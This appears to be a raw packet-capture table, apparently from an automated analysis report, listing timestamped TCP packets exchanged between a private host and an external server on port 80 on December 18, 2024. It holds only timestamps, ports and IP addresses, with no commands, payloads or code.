                                                                                        Dec 18, 2024 20:55:51.781933069 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.782031059 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.784656048 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.784745932 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.784796000 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.787385941 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.788008928 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.788069963 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.790194035 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.835402966 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.835412979 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.835478067 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.836352110 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.836365938 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.836436987 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.837332964 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.837354898 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.837373018 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.838845968 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.838854074 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.838915110 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.840351105 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.840411901 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.840733051 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.842796087 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.842895985 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.843126059 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.845330000 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.845416069 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.845510006 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.848741055 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.848789930 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.848895073 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.855819941 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.855827093 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.855868101 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.856945038 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.856951952 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.857156038 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.858967066 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.859025002 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.859102964 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.861076117 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.861121893 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.861732960 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.863670111 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.863677979 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.863781929 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.865502119 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.865509987 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.865644932 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.867295027 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.867409945 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.867652893 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.869571924 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.869579077 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.869724989 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.871510983 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.871604919 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.871622086 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.873323917 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.873450041 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.873478889 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.875248909 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.875291109 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.875369072 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.877202034 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.877274036 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.877329111 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.879153967 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.879230022 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.879471064 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.881160975 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.881287098 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.881439924 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.884077072 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.884083986 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.884170055 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.885520935 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.885534048 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.885581970 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.887516975 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.887523890 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.887584925 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.890249968 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.890259027 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.890403032 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.891993999 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.892003059 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.892055988 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.893939018 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.893945932 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.894015074 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.897012949 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.897020102 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.897104979 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.899823904 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.899873972 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.899878979 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.901747942 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.901756048 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.901834011 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.903685093 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.903692007 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.903740883 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.905580997 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.905600071 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.905637026 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.906622887 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.906635046 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.906672001 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.907809019 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.907820940 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.907913923 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.908826113 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.908832073 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.908881903 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.909723997 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.909739971 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.909813881 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.910752058 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.910758018 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.910815954 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.911700010 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.911711931 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.911781073 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.912683010 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.912689924 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.912744999 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.914596081 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.914603949 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.914647102 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.914658070 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.914731026 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.915550947 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.916548014 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.916579962 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.916631937 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.917465925 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.917519093 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.917543888 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.918797970 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.918803930 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.918873072 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.919640064 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.919722080 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.919756889 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.921672106 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.921679974 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.921699047 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.921736956 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.921837091 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.922633886 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.923624039 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.923629999 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.923685074 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.924608946 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.924614906 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.924778938 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.925533056 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.925617933 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.926467896 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.926476955 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.926522970 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.926528931 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.927520990 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.927529097 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.927589893 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.928766966 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.928772926 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.928833008 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.929862022 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.929867983 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.929961920 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.930783033 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.930794001 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.930908918 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.932682037 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.932832003 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.027308941 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.027328014 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.027390003 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.028209925 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.028278112 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.028341055 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.029283047 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.029289961 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.029323101 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.029342890 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.030221939 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.030267954 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.030286074 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.031147957 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.031172991 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.031199932 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.032113075 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.032165051 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.032186985 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.032195091 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.032264948 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.048033953 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.048125982 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.048183918 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.048655033 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.048662901 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.048752069 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.049443960 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.049827099 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.049949884 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.050359011 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.050818920 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.050930023 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.051093102 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.051232100 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.051285982 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.051951885 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.052149057 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.052324057 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.053147078 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.053396940 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.053476095 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.054075003 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.054080963 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.054153919 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.054932117 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.054938078 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.054987907 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.055629015 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.055798054 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.055860996 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.056365967 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.056713104 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.056792974 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.057372093 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.057661057 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.057708025 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.058177948 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.058631897 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.058701992 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.059196949 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.059426069 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.059731007 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.060604095 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.060611010 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.060683966 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.061229944 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.061387062 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.061431885 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.061918020 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.061924934 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.062006950 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.062803030 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.063004971 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.063059092 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.063524961 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.063739061 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.063884020 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.064388990 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.064502001 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.064601898 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.065284967 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.065711975 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.065825939 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.066133022 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.066139936 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.066220045 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.067066908 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.067449093 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.067559004 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.067898989 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.068221092 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.068284035 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.068757057 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.069570065 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.069648981 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.069689989 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.069703102 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.069761992 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.070580006 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.071446896 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.071512938 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.071551085 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.071559906 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.071624994 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.072330952 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.072513103 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.072623014 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.073230982 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.073592901 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.073693991 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.074104071 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.074111938 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.074172974 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.075587988 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.075593948 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.075650930 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.077792883 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.077800989 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.077874899 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.078803062 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.079674959 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.079739094 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.080725908 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.081590891 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.081650019 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.083590984 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.083600998 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.083725929 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.085544109 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.085551023 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.085712910 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.087486029 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.087496996 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.087538004 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.090348005 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.090361118 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.090451956 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.092324018 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.092339993 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.092391014 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.094307899 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.094321966 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.094369888 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.096288919 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.096296072 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.096417904 CET4979580192.168.2.7139.99.188.124
